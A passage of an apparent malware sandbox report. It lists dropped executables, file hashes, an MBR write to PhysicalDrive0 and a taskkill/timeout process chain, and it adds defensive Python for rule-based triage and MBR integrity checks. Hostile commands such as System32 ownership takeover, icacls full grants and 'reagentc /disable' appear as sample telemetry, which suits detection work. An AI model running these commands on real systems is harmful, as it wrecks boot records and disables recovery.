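RULES = (rule_system32_acl_takeover, rule_recovery_disabled, rule_policy_lockout,
         rule_system_binary_overwrite, rule_raw_disk_write)


def triage(events):
    """Run every rule over every event; return findings in event order."""
    return [f for ev in events for rule in RULES if (f := rule(ev))]


def rules_hit(findings):
    """Distinct rule names in first-seen order: the stages of the chain."""
    return list(dict.fromkeys(f.rule for f in findings))


# Constructed sample telemetry (assumed PIDs) mirroring the report's process tree.
TEMP_DROPPER = "C:\\Users\\Admin\\AppData\\Local\\Temp\\AdStRkJ.exe"
SAMPLE_EVENTS = [
    {"event": "registry_set", "pid": 1048, "value": "DisableRegistryTools", "data": 1,
     "key": "\\REGISTRY\\USER\\S-1-5-21-1658372521-4246568289-2509113762-1000"
            "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"},
    {"event": "process_create", "pid": 1500, "image": "C:\\Windows\\system32\\takeown.exe",
     "cmdline": "takeown /f C:\\Windows\\System32"},
    {"event": "process_create", "pid": 1504, "image": "C:\\Windows\\system32\\icacls.exe",
     "cmdline": "icacls C:\\Windows\\System32 /grant Admin:F"},
    {"event": "process_create", "pid": 1520, "image": "C:\\Windows\\system32\\ReAgentc.exe",
     "cmdline": "reagentc.exe /disable"},
    {"event": "file_create", "pid": 1048, "image": TEMP_DROPPER,
     "target": "C:\\Windows\\System32\\sfc.exe"},
    {"event": "file_create", "pid": 1520, "image": "C:\\Windows\\system32\\ReAgentc.exe",
     "target": "C:\\Windows\\system32\\Recovery\\ReAgent.xml"},  # legitimate, not flagged
    {"event": "raw_access", "pid": 2620, "image": "C:\\Program Files\\Windows NT 32\\MBR.exe",
     "target": "\\??\\PhysicalDrive0"},
    {"event": "process_create", "pid": 1600, "image": "C:\\Windows\\system32\\icacls.exe",
     "cmdline": "icacls C:\\Users\\Admin\\Documents /grant Admin:F"},  # benign, not flagged
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:<26} {f.technique:<9} pid={f.pid:<5} {f.evidence}")
```

Any single rule here fires on ordinary administration now and then (an admin may well run icacls on System32, or reagentc /disable before imaging); what makes the run above unambiguous is the ordering that `rules_hit` exposes, so alert on the sequence, or on the raw disk handle and the System32 overwrite from a %TEMP% image, which have no routine explanation.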
Network
Files
memory/1048-0-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1048-1-0x0000000000030000-0x0000000002190000-memory.dmp
memory/1048-2-0x000000001D470000-0x000000001D4F0000-memory.dmp
C:\Program Files\Windows NT 32\lock_files.exe
| MD5 | 1a287576d58f0c02fc4b772c594148eb |
| SHA1 | 6a7caea118b97dc253a7f67ce0b7118b7fd78136 |
| SHA256 | ebd87671cbcf7c6409571c18e2d8350662851df64e6644c76b12a1b40a8c1dc6 |
| SHA512 | ca6ef3c8433b0f1d68458665ee9bbb7b323c2404100d5c86d6a6b327bdcdba8dec0aea3412772cd6e646b16aae36afd3d2a73be70f9b6500ab5f0d065a7e3eb6 |
C:\Program Files\Windows NT 32\MBR.exe
| MD5 | a0195c08fbfe459520423bf0a7c20504 |
| SHA1 | 9d62a03597d8c056951e8d377b4db62b51fbbfa3 |
| SHA256 | 95a2cfb0da507b544ae915d6fd2a8d4fd8acb2456310e11d1bc066b531449ea9 |
| SHA512 | 51c9cc7ade18fe5ffd8c58df5f573f625ee6831a8e3d87b8d529ad67a4334a7ca69e311e3a2b93e33b57879c93e20e8d7eef9f3ebc22b55c63f6a7a759bbadc5 |
memory/2620-21-0x0000000000400000-0x0000000000433000-memory.dmp
memory/1048-22-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1048-23-0x000000001D470000-0x000000001D4F0000-memory.dmp
C:\Program Files\Windows NT 32\AdStRkJ_sound.exe
| MD5 | 330d74c84f4597a0c7f45b232c7b0ae2 |
| SHA1 | 46d93d7d2907e60c0b5fb3fd7246410c33a591e9 |
| SHA256 | 6b685298579ec278cf041c12ef0ddbc102567ef274bdd43711643da89ba799e1 |
| SHA512 | c88cd6a3e511a76e6baccf9b30ace996689432e335b264996cf6ce3b2f0947515e34151bc620dae1a05d96342be0f856832814a3b7cd5b898b0f8b08ca371814 |
memory/324-28-0x0000000000D90000-0x0000000000DB8000-memory.dmp
memory/324-29-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1048-30-0x000000001D470000-0x000000001D4F0000-memory.dmp
C:\Program Files\Windows NT 32\sound.wav
| MD5 | c22ec43f4e6c8b4189860c054a4064e5 |
| SHA1 | 3b1885ca71df82a3906c71b51c0a373e8dc4d474 |
| SHA256 | 35481f89e8b2eee81ceb5b514b44cb13dca103603a2501fbac6826fbca490c0f |
| SHA512 | 51a88f9e4ccee4528c47c909eb6141338f6371591276bcb2eb1dcda92ace4af621e2c8a9d36def7403a9ed8a591ef0e544108d4f539737b9054ddebef068d432 |
memory/1048-32-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-33-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-34-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-35-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-36-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-37-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-38-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/324-39-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp
memory/1048-40-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-41-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-42-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-43-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-44-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-45-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-46-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-47-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-48-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-49-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-50-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-51-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-52-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-53-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-54-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-55-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-56-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-57-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-58-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-59-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-60-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-61-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-62-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-63-0x000000001D470000-0x000000001D4F0000-memory.dmp
memory/1048-64-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-65-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-67-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-66-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-68-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-69-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-70-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-71-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-72-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-73-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-74-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-75-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-76-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-77-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-78-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-79-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-80-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-81-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-82-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-83-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-84-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-85-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-86-0x0000000020870000-0x0000000020970000-memory.dmp
memory/1048-87-0x0000000020870000-0x0000000020970000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win7-20240215-en
Max time kernel
137s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mousedraw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\circle.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\reds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\cubes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\txtout2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\PatBlt3.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe | N/A |
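The row above records only that mbrwriter.exe opened \??\PhysicalDrive0 for modification; the report does not show what was written, and a raw handle to sector 0 is all an MBR wiper or bootlocker needs. On a host where this sample ran, the first triage step is to read the first 512 bytes of the disk and compare them with a known-good copy (an imaging baseline, or the sector from an identical build). The Python below is an added example, not part of the sandbox report or of the analysed sample: it parses the boot signature and partition table, names the regions that differ from a baseline, and includes two constructed sectors (a healthy one and one overwritten end to end with filler text) so it runs offline. The device path, the region names and the function names are my assumptions.

```python
import struct
from dataclasses import dataclass
from typing import List

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 0x1BE   # 446: four 16-byte entries follow the boot code
BOOT_SIGNATURE_OFFSET = 0x1FE    # 510: 0x55 0xAA closes a valid MBR
BOOT_SIGNATURE = b"\x55\xAA"
ENTRY_FORMAT = "<B3sB3sII"       # status, CHS start, type, CHS end, LBA start, sector count


@dataclass
class PartitionEntry:
    index: int
    bootable: bool
    type_id: int
    lba_start: int
    sector_count: int


@dataclass
class MbrReport:
    signature_ok: bool
    bootcode_all_zero: bool
    partitions: List[PartitionEntry]

    @property
    def looks_intact(self) -> bool:
        # A usable MBR has the 0x55AA trailer, non-zero boot code and at least one real partition.
        has_partition = any(p.type_id != 0 and p.sector_count > 0 for p in self.partitions)
        return self.signature_ok and has_partition and not self.bootcode_all_zero


def parse_mbr(sector: bytes) -> MbrReport:
    """Decode sector 0: boot code, the four partition entries and the trailing signature."""
    if len(sector) < SECTOR_SIZE:
        raise ValueError(f"need {SECTOR_SIZE} bytes, got {len(sector)}")
    entries = []
    for i in range(4):
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack_from(
            ENTRY_FORMAT, sector, PARTITION_TABLE_OFFSET + 16 * i)
        entries.append(PartitionEntry(i, status == 0x80, ptype, lba, count))
    sig_ok = sector[BOOT_SIGNATURE_OFFSET:BOOT_SIGNATURE_OFFSET + 2] == BOOT_SIGNATURE
    return MbrReport(sig_ok, not any(sector[:PARTITION_TABLE_OFFSET]), entries)


def diff_regions(live: bytes, baseline: bytes) -> List[str]:
    """Name the MBR regions in which the live sector differs from a known-good copy."""
    regions = {
        "bootcode": (0, PARTITION_TABLE_OFFSET),
        "partition_table": (PARTITION_TABLE_OFFSET, BOOT_SIGNATURE_OFFSET),
        "signature": (BOOT_SIGNATURE_OFFSET, SECTOR_SIZE),
    }
    return [name for name, (a, b) in regions.items() if live[a:b] != baseline[a:b]]


def read_live_mbr(device: str = r"\\.\PhysicalDrive0") -> bytes:
    """Read sector 0 of a raw device (assumed path); needs administrator rights on Windows."""
    with open(device, "rb") as fh:
        return fh.read(SECTOR_SIZE)


def constructed_healthy_mbr() -> bytes:
    """Constructed sample, not a dump from the sandbox VM: boot stub, one bootable NTFS (0x07) partition, valid trailer."""
    sector = bytearray(SECTOR_SIZE)
    sector[0:2] = b"\x33\xC0"                   # xor ax,ax: how many BIOS boot stubs begin
    entry = struct.pack(ENTRY_FORMAT, 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 204800)
    sector[PARTITION_TABLE_OFFSET:PARTITION_TABLE_OFFSET + 16] = entry
    sector[BOOT_SIGNATURE_OFFSET:SECTOR_SIZE] = BOOT_SIGNATURE
    return bytes(sector)


def constructed_wiped_mbr() -> bytes:
    """Constructed sample of a sector overwritten with a text payload: no partition table, no trailer."""
    return (b"OVERWRITTEN " * 43)[:SECTOR_SIZE]


if __name__ == "__main__":
    baseline = constructed_healthy_mbr()
    for label, sector in (("healthy", baseline), ("wiped", constructed_wiped_mbr())):
        report = parse_mbr(sector)
        print(label, "intact" if report.looks_intact else "DAMAGED", diff_regions(sector, baseline))
```

On the win7 images used for these runs the disk is MBR-partitioned, so sector 0 is the real boot record; on a GPT/UEFI host the same sector holds the protective MBR (one entry of type 0xEE), and a rewrite there still breaks legacy boot tooling even though the firmware boots from the EFI partition. Capture the baseline before detonation, not after.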
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\mousedraw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\circle.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\reds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\cubes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\PatBlt3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\txtout2.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Anatralier.exe
"C:\Users\Admin\AppData\Local\Temp\Anatralier.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1268.tmp\1269.bat C:\Users\Admin\AppData\Local\Temp\Anatralier.exe"
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe
mbrwriter.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.exe
1.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mlt.exe
mlt.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mousedraw.exe
mousedraw.exe
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\system32\taskkill.exe
taskkill /f /im 1.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im mlt.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.exe
ATohou.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\circle.exe
circle.exe
C:\Windows\system32\timeout.exe
timeout 30
C:\Windows\system32\taskkill.exe
taskkill /f /im circle.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im ATohou.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.exe
AWave.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\reds.exe
reds.exe
C:\Windows\system32\timeout.exe
timeout 40
C:\Windows\system32\taskkill.exe
taskkill /f /im AWave.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im reds.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.exe
bytebeat.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\cubes.exe
cubes.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe
scl.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\PatBlt3.exe
PatBlt3.exe
C:\Users\Admin\AppData\Local\Temp\1268.tmp\txtout2.exe
txtout2.exe
C:\Windows\system32\timeout.exe
timeout 60
Network
Files
C:\Users\Admin\AppData\Local\Temp\1268.tmp\1269.bat
| MD5 | 9bbf761a8af3bc468e81625de8a66776 |
| SHA1 | af48afce2581501b5f8a1b949fe6f12145256653 |
| SHA256 | e0392f29af97bada38428aff5574776a44cb757c6ef8a7cfe9c93b86e8d61d5c |
| SHA512 | cce724b5ede94b729767b449b29082399b8d041e5fb51b75164807ae0d249eac0fb17aaec43e0077493ee8b5c03b6d9f89f050e063c8b0009fa7beefdb329e66 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\prompt.vbs
| MD5 | 7d598596e9af07501ca9f98f5d32166e |
| SHA1 | 21c748745a9c2f98ee88cfeb9d3d0d77523a0aa0 |
| SHA256 | 4f641829a7a076a5c5d77e4561779d62a3dded791fbf52e10bcbd0c3045ad402 |
| SHA512 | a63cceb82d70810feaf94c85123f8f861f59b918b9168d43efb6ef2ba8e82ed410718d540a2fa0d74aecfd40dda1c23e25563c52fe69b80407c31a661b81a561 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mousedraw.exe
| MD5 | f7db0edd465e545dcd947f4beef32779 |
| SHA1 | a02d2dcbe4ea1146b726a6191354340f8dd41f6a |
| SHA256 | 9bbce9c9e1b513084b8a206e935b2512a341fd81688e71735ef27511d0378d47 |
| SHA512 | 6d40cf365a30277328f9103083e939ac8fedf860ffef6d0c5bd80d708e0f73d606f456d37aa1fa5e69964ac2e20c263fbaa755a9c28eff962395e3509a7a4e25 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.wav
| MD5 | 8c5007acc14fc8fd7aa7dc659e30ebb5 |
| SHA1 | 91025f286d71dd7821989c24f752369c360386ba |
| SHA256 | bcfd13d3f19003f29e2ebf48a696972a427ba53c7d93f59340431d00e550c30e |
| SHA512 | 0cb8a6e4760410a4f739f32339a8ee85fc7e41099eba204d255bda5e9497ab584b1483115617c946dcbe7c8ba8c3d0763d81d29cbaf70812213f9ad17d974188 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mlt.exe
| MD5 | bc183f5854488a0774969ec19b492153 |
| SHA1 | 2e08a1bbf1b09d989f86b80ce5cdc4f22dc65ad5 |
| SHA256 | 4b97506ae7118dea78e251492166888732815f5cdc90b9c56de2f9ee3862b20f |
| SHA512 | 25a0d999d5d620f48e8d4bc1cb59013ecb5d33250d72e23211e5348fb38573cb3ec82a8370547b59bde9c4d7e555ec7f1dd48c284eabf0f33b595e562f4d3780 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\1.exe
| MD5 | a14ba46ecdc37d9e73efd734b0ab4db9 |
| SHA1 | 9e72f4b89d2643110b2e3efc80c14222a5e00014 |
| SHA256 | 94aa578b5c5fe98f2f8e81705fff8addab6f2f4c2749778ef942b1cfab5b6aa8 |
| SHA512 | 432bbda373fb97bef1a1a8a7292eb85f70cb7866741bf000d5775a6a9a261124ab24b3e053a6f4726a5b3e48d5c5de4f86deb24ea25265dd0945b9740156268b |
memory/2760-49-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1268.tmp\mbrwriter.exe
| MD5 | e2b95fc712d453a57101f9867d384d2c |
| SHA1 | 993eb1acb51ad2ab2e280d3729a56817a3097085 |
| SHA256 | e505465cef9e734ef29dd9803c848960a55dc6c35fa4bf8c275336d2119ddc62 |
| SHA512 | 25a4b6cc6d8908933ef13737aabe0bd56c1356b5f98bfe3e09c6b92fb358a1a65e35549e2d624574fda23fc91731091f0a80eeb9dc5ca2c1d96ba9a88fd5f109 |
memory/2488-57-0x0000000000400000-0x0000000000409000-memory.dmp
memory/2704-58-0x0000000000400000-0x000000000041D000-memory.dmp
memory/2256-59-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.exe
| MD5 | d7064aa7ee28f685757e7455d4e49c6a |
| SHA1 | 535d326ab1453bed0c050c8822aee9ef54c8b26e |
| SHA256 | 5028f3b3e63609038404bf6e3c2dbc360892312d85aa11e83489f381f09fb99b |
| SHA512 | 2a0747087ea14c664688d3453be8f40d396ca916143f0473eb1739fbe5cf1f19a451359d1e8713fe19b3bdda21eaea20a8294b23c0d99dd793818e85b83c28f8 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\ATohou.wav
| MD5 | 69b31b718e20cc6723c4a816c2aceeb0 |
| SHA1 | 3a3213accba0d99792703b77da74ecd2a2b8510c |
| SHA256 | 9a517e95d9ad086fa73e5ab81bc26e6750e80c42ddb574ed51bedb97a9557c58 |
| SHA512 | 4c918a7d24e20fe60026576aafb625431a36bc4b83dc4c00d30859b0b40ca561046453b0a9c89a92a36dd733ffe3a17214d44653c6c39ef2f5e908ac4227f9ae |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\circle.exe
| MD5 | ed169e40a69cf73fd3ac59215b24063f |
| SHA1 | 32d49462e74e6c08b941d8cd530a5f3c0f3b5764 |
| SHA256 | b8ffde2fc69292ffa1a704a1cf977eedfc86277a61d4937245d218d22674178c |
| SHA512 | f949a7b9b5dae91f887e7ce9bb45f7500534873d3baab5f5c2b1c31b1e185e70278ceb9d4f03f495460e0fb96399239fa678b0b4750ee870cbaa6333ab5ebb6c |
memory/1124-81-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1980-82-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.exe
| MD5 | 9cbf1f1e4821fa5b8962423c9b2ecf24 |
| SHA1 | 7f3fd62332d10cfdb0be3452a71cd6df2d7c0602 |
| SHA256 | afcb1f5e73785c0c5952394ca69986e9b9e86cc5fb0a4de4684903a03d9859a4 |
| SHA512 | bee905b459259801185c55e25f8e70fa563ea8ecaa0ad300aea0379500fe683d6bc370ae3d7a0d53898443faf150a1081f23146c8e32deb6961fe955aa0003c8 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\reds.exe
| MD5 | 8ae9221dcd3eb86c479ad3a272e47c4b |
| SHA1 | fd55b36bdebd91773a2a14636fef6738c5fe9d35 |
| SHA256 | 4e46b8ffffd081aaeae5b5f21e8c1bc5c07eb6a16593c08b030c514cf55e8767 |
| SHA512 | 1d482f7c13269cdd546eaad0b4af7bd6a0d524c0df93365440b823bc6a4eb49e84332c683318fcf200e3375b6536bcdddac0e14bd73fbdeb4874a69c8ea41c02 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\AWave.wav
| MD5 | e62fbfae11374ec4a953725d0cee01be |
| SHA1 | 82e6be96bf64ee283ac3c6e8ca60acf4c8a47100 |
| SHA256 | 5dd0971a53b93394df0eba4bf8f4aa845a73c1306fe4fc0c130891fc8380838f |
| SHA512 | 74be448a3ec8746bf157e8e7e964c62914b24a618f339698cb4ad67803470d89563079e628b1f6243f0200a6d051bcfdc089a1ee177be23eca04ce00fa8df8fd |
memory/1784-95-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1776-96-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.exe
| MD5 | 6dba963d56ae1fcdfd6e840a52416801 |
| SHA1 | 5ad332cce4c7556cc0aa72b9d5792f42e3873b3b |
| SHA256 | eb3940fb1f2a0b16f5e58c7f4b707fb26b6ee08ebe7f5c43b9c02fcf02fe4506 |
| SHA512 | c0ab4d15323aad3f35f82f90e55798a235f8c41fb84308f76566bd758c9a649031c11610af13bea472cf787ed18d53e6e61962ee41ad97854e028bbb47fc4edc |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\cubes.exe
| MD5 | ed695dac2b14ccad335e75f5ddd44139 |
| SHA1 | 35f4fae272c9b8dc84ffdae9b4dbfa4ed32936eb |
| SHA256 | 2d3e7cdbf244704934afa447552c049a891a9ccbd6d4ab42ca2504ad0a99e803 |
| SHA512 | a028c258cc65e208303f458279035d430f8447c6ca950d2de9c345aa7c2a13cff3a36fefdeb9305f8caaffc7da91fff91e05ef8e52b9d3672f7a71b49bbf47d5 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\PatBlt3.exe
| MD5 | 08e74e5f077f0337d0c0d15dde94f8be |
| SHA1 | d5ba49b2ddfe50ea4b214e0f447cbed7fb949279 |
| SHA256 | b41d36f67e147133f8c3aa054b52275f68d7e2735a65eb3abcdcd08bede1100b |
| SHA512 | f102a81b56c053a7c492a0459f9e7410346949074fc68e733ae9174651bb0265266560526782fe1e95cb2769f54fca3071f56839126d9fc8d7266828b9228fa1 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\txtout2.exe
| MD5 | 21d90b4350b6c69d01174240997806c3 |
| SHA1 | ca6cdfe5f7f0a15ca177eabf7596d64bc284215c |
| SHA256 | ecadb0f872cf2c112620e0bfdb9f657dd5ac25188c762b2ed7261f9612163757 |
| SHA512 | 1e8089c7c6f1660652b29ab5a5ccac7a51dfa5fa2e28144df5a196b232b4ac489d5eee7e873144365004b76995ce8315d29f7af5ffc90130b61c38a06f1966a7 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\scl.exe
| MD5 | af4005307577b1e437aa4ca33e00ec4b |
| SHA1 | 05eaefaa7d511a8b0d9c7a0819a4f20b5ea7d206 |
| SHA256 | 159c66ebe8ef08ca2a7502e76344bc0b8c1f9e51d7bed2bad1af164d7aa8a6f4 |
| SHA512 | c27366274ac12e20c11350da2fb9e668b8592e31764c249aaa29df28e1115d215e7604327d2e81c83107e0f70eec7da1443814f3883dc004806e918d62e8dad4 |
C:\Users\Admin\AppData\Local\Temp\1268.tmp\bytebeat.wav
| MD5 | 29172c1ae05949d3b9e0f1ad6df73da4 |
| SHA1 | 73dfddb924eb3d0cf3b224e3617b3b249882a6e4 |
| SHA256 | 4d4900dcb852b2fe933abf00eba70f1c1ab3f0d9d479bb7ec781dafcc7c0796e |
| SHA512 | cd51bcd0f9f711ce385934ecf9d483e2ba1e64295f1f1db70361911b0c518e4e197bdbabfc630fb4d18f7bd785058fe009ac326f927d8fb00afe06deeacde95f |
Analysis: behavioral9
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
139s
Max time network
195s
Command Line
Signatures
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
